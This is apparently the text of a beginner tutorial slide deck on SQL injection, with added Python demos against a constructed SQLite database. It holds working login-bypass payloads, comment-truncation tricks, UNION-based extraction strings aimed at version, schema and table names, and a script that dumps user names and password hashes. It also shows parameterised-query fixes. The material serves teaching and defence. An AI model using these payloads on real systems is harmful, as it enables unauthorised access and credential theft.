^ I hope - You gotcha ^
Hashtag for this session
#WTBNT12 , #SQLi , #SQLinjection
: Twitter handle for feedback :
@weekendtesting @Abhinav_Sejpal
G+ https://plus.google.com/events/c1hkhlb3tkmmrc0ikkr5r2sgji0
Tamper Google HTTP request!
If your answer is 'No', then be ready to meet the 'Nightmare'.
Conclusion
Modern websites rely on user input for everything.
They are basically applications which expect various kinds of inputs coming from users to function a certain way.
~ Courtesy @makash ~
SQL stands for Structured Query Language.
(source: Privacyrights.org)
SQLi is an old-days problem - I shouldn't worry about it.
I am using a modern Java / PHP / Ruby / ASP framework.
CakePHP demo
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND password = "pass"
Basic PHP statement for the login page (vulnerable: the user name is concatenated straight into the query):-
$query = "SELECT * FROM users WHERE username='".$username."' AND password='".md5($pass)."'";
* md5() hashes the password before it is concatenated (a hash, not encryption; unsalted MD5 is also far too weak for storing passwords, but that is a separate problem). $username is spliced in untouched.
* Demo at SQL *
#Attack - 1
Injection code (user name field):-
admin' or '1'='1
Resulting query:-
SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'
Attack 1 relies on the user name: AND binds tighter than OR, so the clause reads username='admin' OR ('1'='1' AND password='...'), and it is the first half that matches the admin row.
You can't perform this attack through the password field, because that input is passed through md5() before it reaches the query.
User name = anything' or '1' ='1
password = anything' or '1'='1
* A known user name is mandatory here: with 'anything' the first half of the OR matches no row, and the password half is hashed before it reaches the query *
When the user name is known, i.e. 'admin':
<It simply works>
But you can't perform this attack if the user name
MySQL comment syntax (http://dev.mysql.com/doc/refman/5.1/en/comments.html):
# : single-line comment
"-- " (two dashes followed by a space) : comment to end of line
/* ... */ : block comment
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND password = "pass"
What if I insert a comment into the first attack?
SELECT * FROM users where username='admin' or '1'='1' # AND password = '<md5 of pass>'
<< AND password = ... >> doesn't execute at all; it is now part of the comment.
The WHERE clause is always true because of '1'='1', so it no longer matters whether you know the user name or not: the query returns every row in users.
Yes - I am done. But what if '#' is not accepted as input?
* "--" followed by a space is the alternative syntax
admin' or '1' = '1' --    : False (no trailing space, so MySQL does not treat it as a comment)
admin' or '1' = '1' -- : True
Most people forget to add the space, and a trailing space is easily trimmed by the browser or the application, so I use the vector below:
admin' or '1' = '1' -- space + any one character
E.g. > admin' or '1' = '1' -- Sandy
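The three login payloads above (known user name, unknown user name, comment truncation) run against a constructed in-memory database, as an added example that is not part of the original slides. It uses Python's sqlite3 as a stand-in for MySQL, so the comment marker is `--` (SQLite does not know `#`, and unlike MySQL it does not insist on a space after `--`); the user table, passwords and the `build_query`/`vulnerable_login`/`safe_login` names are assumptions made for the demo. The parameterised `safe_login` shows the fix the slides do not spell out.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed stand-in for the slide's `users` table (SQLite in memory, not MySQL)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    for uid, user, pw in [(1, "admin", "s3cret"), (2, "sandy", "letmein")]:
        con.execute("INSERT INTO users VALUES (?, ?, ?)",
                    (uid, user, hashlib.md5(pw.encode()).hexdigest()))
    return con


def build_query(username, password):
    """Same construction as the slide's PHP: string concatenation, password md5'd first."""
    return ("SELECT username FROM users WHERE username='" + username
            + "' AND password='" + hashlib.md5(password.encode()).hexdigest() + "'")


def vulnerable_login(con, username, password):
    """Returns the user names the concatenated query matches (empty list = login failed)."""
    try:
        rows = con.execute(build_query(username, password)).fetchall()
    except sqlite3.Error:
        return []  # malformed SQL: the login fails (a real app would also leak the error)
    return [r[0] for r in rows]


def safe_login(con, username, password):
    """Hardened form: the same check with bound parameters, so input is data, never SQL."""
    rows = con.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, hashlib.md5(password.encode()).hexdigest()),
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    con = make_db()
    # Attack 1: AND binds tighter than OR, so the WHERE clause becomes
    #   username='admin' OR ('1'='1' AND password='<md5>')
    # and matches exactly the admin row, but only because 'admin' exists.
    print(vulnerable_login(con, "admin' or '1'='1", "I dont know"))  # ['admin']
    # Same payload with an unknown user: 'anything' matches nobody, and the
    # password copy is md5'd before it reaches the SQL, so nothing comes back.
    print(vulnerable_login(con, "anything' or '1'='1", "anything' or '1'='1"))  # []
    # Comment attack: everything after '--' is dropped, the password check
    # disappears and '1'='1' alone selects every user, known name or not.
    print(sorted(vulnerable_login(con, "anything' or '1'='1' -- x", "whatever")))  # ['admin', 'sandy']
    # Parameterised query: the payload is compared literally against the column.
    print(safe_login(con, "admin' or '1'='1", "I dont know"))  # []
    print(safe_login(con, "admin", "s3cret"))  # ['admin']
```

Read `build_query`'s output for each payload before looking at the results: the precedence point is visible in the string itself, and it is the reason the first payload needs a real user name while the commented one does not.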
ssshhh - Do you hear that? - NO
* Identify how many columns the query selects (grow 1,2,3,... until the UNION stops erroring).
* Identify which of those columns is displayed on the page; that is where the extracted value goes.
a%' union select 1,2,3,4,5 from users #
a%' union select 1,@@datadir,2,3,4 from users #
a%' union select 1,@@version,3,4,5 from users #
a%' union select 1,table_schema,2,3,4 from information_schema.tables #
a%' union select 1,table_schema,table_name,3,4 from information_schema.tables #
a%' union select 1,table_schema,table_name,3,4 from information_schema.tables where table_schema='sqlhumla'#
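The UNION procedure above, carried through end to end against a constructed database, as an added example that is not part of the original slides. It assumes the injectable input is a product search that splices the term into a LIKE pattern (which is what the `a%'` prefix in the slide's payloads implies), and uses SQLite in place of MySQL, so `sqlite_version()` stands in for `@@version`, `sqlite_master` for `information_schema.tables`, and `--` for `#`. The schema, the `products`/`users` rows and the function names are assumptions made for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample schema: a searchable products table plus the users table to steal."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)",
                    [(1, "apple", 1.0), (2, "banana", 0.5), (3, "cherry", 3.0)])
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
                     (2, "sandy", "deadbeefdeadbeefdeadbeefdeadbeef")])
    return con


def vulnerable_search(con, term):
    """Assumed vulnerable search: the term is spliced into a LIKE pattern, which is why
    the payloads start with a%' (finish the pattern, close the quote, then inject)."""
    query = "SELECT id, name, price FROM products WHERE name LIKE '%" + term + "%'"
    return con.execute(query).fetchall()


def find_column_count(con, max_cols=10):
    """Step 1: grow 1,2,3,... until the UNION stops failing; the first count that
    executes is the number of columns the original SELECT returns."""
    for n in range(1, max_cols + 1):
        placeholders = ",".join(str(i) for i in range(1, n + 1))
        try:
            vulnerable_search(con, "a%' UNION SELECT " + placeholders + " -- ")
            return n
        except sqlite3.OperationalError:  # "...do not have the same number of result columns"
            continue
    return None


def injected_rows(con, shown_value, source=""):
    """Step 2: put the interesting value in the second column (the one the page displays)
    and search for a term no product matches, so only the injected rows come back."""
    payload = "zzz%' UNION SELECT 1, " + shown_value + ", 3" + source + " -- "
    return vulnerable_search(con, payload)


def db_version(con):
    """Slide: @@version. SQLite exposes sqlite_version() instead."""
    return injected_rows(con, "sqlite_version()")[0][1]


def list_tables(con):
    """Slide: information_schema.tables. SQLite keeps its schema in sqlite_master."""
    rows = injected_rows(con, "name", " FROM sqlite_master WHERE type='table'")
    return sorted(r[1] for r in rows)


def dump_users(con):
    """Final step: pull user name and password hash out through the displayed column."""
    rows = injected_rows(con, "username || ':' || password", " FROM users")
    return sorted(r[1] for r in rows)


if __name__ == "__main__":
    con = make_db()
    print(vulnerable_search(con, "app"))   # normal use: [(1, 'apple', 1.0)]
    print(find_column_count(con))          # 3
    print(db_version(con))                 # e.g. '3.45.1' (depends on the local SQLite)
    print(list_tables(con))                # ['products', 'users']
    print(dump_users(con))                 # ['admin:5f4d...', 'sandy:dead...']
```

The fix is the same as for the login form: bind the search term as a parameter (`WHERE name LIKE ?` with `'%' + term + '%'` passed as the value), after which the `'` in the payload is just a character inside the pattern.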
There is no silver bullet to stop this - Just Trust your code
~ Keep Hacking your Code ~
^ Google search for #Sqlinjection ^
Feel free to write me at bug.wrangler at outlook.com
https://slides.com/abhinavsejpal/sql-injection-for-beginners/
copyrights 2013-2014 Abhinav Sejpal
-----
Attribution-NonCommercial-NoDerivs 3.0 Unported
Dedicated to my lovely daddy